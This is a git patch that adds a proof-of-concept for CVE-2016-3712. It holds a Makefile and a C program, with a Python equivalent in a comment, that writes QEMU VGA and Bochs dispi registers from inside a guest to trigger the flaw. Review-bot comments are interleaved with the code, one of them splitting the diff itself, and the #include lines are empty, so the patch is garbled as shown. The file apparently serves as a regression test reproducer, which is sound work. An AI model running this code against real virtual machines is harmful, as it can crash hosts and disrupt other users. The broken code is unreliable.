From 49f82d81cc61e57764e4429beadfec51de02fa9c Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann
Date: Tue, 7 Feb 2017 12:28:06 +0100
Subject: add cve-2016-3712
---
 .gitignore | 1 +
 Makefile | 14 ++++++++++++
 cve-2016-3712.c | 71 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 86 insertions(+)
 create mode 100644 .gitignore
 create mode 100644 Makefile
 create mode 100644 cve-2016-3712.c
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..6ae7d26
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+cve-2016-3712
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..897a38e
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,14 @@
+
+CC ?= gcc
+CFLAGS ?= -Os -g
+CFLAGS += -Wall
+
+SOURCES := $(wildcard *.c)
+TARGETS := $(patsubst %.c,%,$(SOURCES))
+
+all: $(TARGETS)
+
+clean:
+ rm -f $(TARGETS)
+ rm -f *~
+
diff --git a/cve-2016-3712.c b/cve-2016-3712.c
new file mode 100644
index 0000000..d94c26c
--- /dev/null
+++ b/cve-2016-3712.c
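Review bot: `all` and `clean` are not declared phony, so a stray file named `clean` or `all` in the tree silently disables that target; add `.PHONY: all clean` above `all: $(TARGETS)`. The `CFLAGS ?= -Os -g` line means any CFLAGS inherited from the environment replaces `-Os -g` entirely (only `-Wall` is always appended), which is fine for a PoC build but deserves a one-line comment such as `# CFLAGS from the environment replace -Os -g; -Wall is always appended`.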
@@ -0,0 +1,71 @@
+/*
+ * python version:
+ * -------------------------------------------------------------
+
+from periphery import MMIO
+import time
+mmio_base = 0xfebd4000
+mmio_range = 0x1000
+mmio = MMIO(mmio_base, mmio_range)
+mmio.write16(0x0504, 0x4000)
+time.sleep(1) # wait screen refreshing
+
+mmio.write8(0x040E, 0x85)
+mmio.write8(0x040F, 0xB4)
+mmio.write8(0x0404, 0x49)
+mmio.write8(0x0405, 0xFC)
+time.sleep(1) # wait screen refreshing
+
+mmio.write8(0x0507, 0x20)
+
+ * -------------------------------------------------------------
+ * below is the c version, not requiring the vga mmio bar,
+ * using io port access to vga and vbe ports instead.
+ *
+ * see docs/specs/standard-vga.txt in qemu repo for mmio bar spec.
+ */
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+int main(int argc, char *argv[])
+{
+ if (ioperm(0x3c0, 0x20, 1) < 0) {
+ perror("ioperm vga");
+ exit(1);
+ }
+ if (ioperm(0x1ce, 0x04, 1) < 0) {
+ perror("ioperm vbe");
+ exit(1);
+ }
+
+ fprintf(stderr, "#1 ... \n");
+ // mmio.write16(0x0504, 0x4000)
+ outw(0x0002, 0x1ce);
+ outw(0x4000, 0x1d0);
+ sleep(1);
+
+ fprintf(stderr, "#2 ... \n");
+ // mmio.write8(0x040E, 0x85)
+ outb(0x85, 0x3ce);
+ // mmio.write8(0x040F, 0xB4)
+ outb(0xb4, 0x3cf);
+ // mmio.write8(0x0404, 0x49)
+ outb(0x49, 0x3c4);
+ // mmio.write8(0x0405, 0xFC)
+ outb(0xfc, 0x3c5);
+ sleep(1);
+
+ // mmio.write8(0x0507, 0x20)
+ fprintf(stderr, "#3 ... \n");
+ outw(0x0003, 0x1ce);
+ outw(0x0020, 0x1d0);
+ sleep(1);
+
+ fprintf(stderr, "done\n");
+ exit(0);
+}
--
cgit
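Review bot: The third step may not be a faithful translation of the python line it cites: the file itself maps the 16-bit write to 0x0504 onto dispi index 2, so 0x0506 is index 3 and `mmio.write8(0x0507, 0x20)` is a byte write to the odd (upper) half of that 16-bit register, whereas `outw(0x0003, 0x1ce); outw(0x0020, 0x1d0);` stores 0x0020 in the whole register — the value the device ends up with could differ depending on how QEMU merges sub-word MMIO writes, so please verify both variants reach the crash and state the intended register value in the comment. The program also pokes 0x1ce/0x1d0 without confirming a Bochs/QEMU dispi interface is present; a guard such as `outw(0x0000, 0x1ce); if ((inw(0x1d0) & 0xfff0) != 0xb0c0) { fprintf(stderr, "no bochs dispi\n"); exit(1); }` before step #1 avoids writing to unrelated hardware if the binary is ever run outside a QEMU std-vga guest. glibc's outb()/outw() take (value, port), the reverse of the (port, value) order some other environments use, so a one-line comment above the first `outw` — `/* glibc: out*(value, port) */` — would spare readers a lookup. Finally, the header comment should say that the tool needs root (ioperm requires CAP_SYS_RAWIO, which is why both calls can fail with `exit(1)`) and that the VGA and VBE registers are deliberately left in the altered state, since nothing restores them before `exit(0)`.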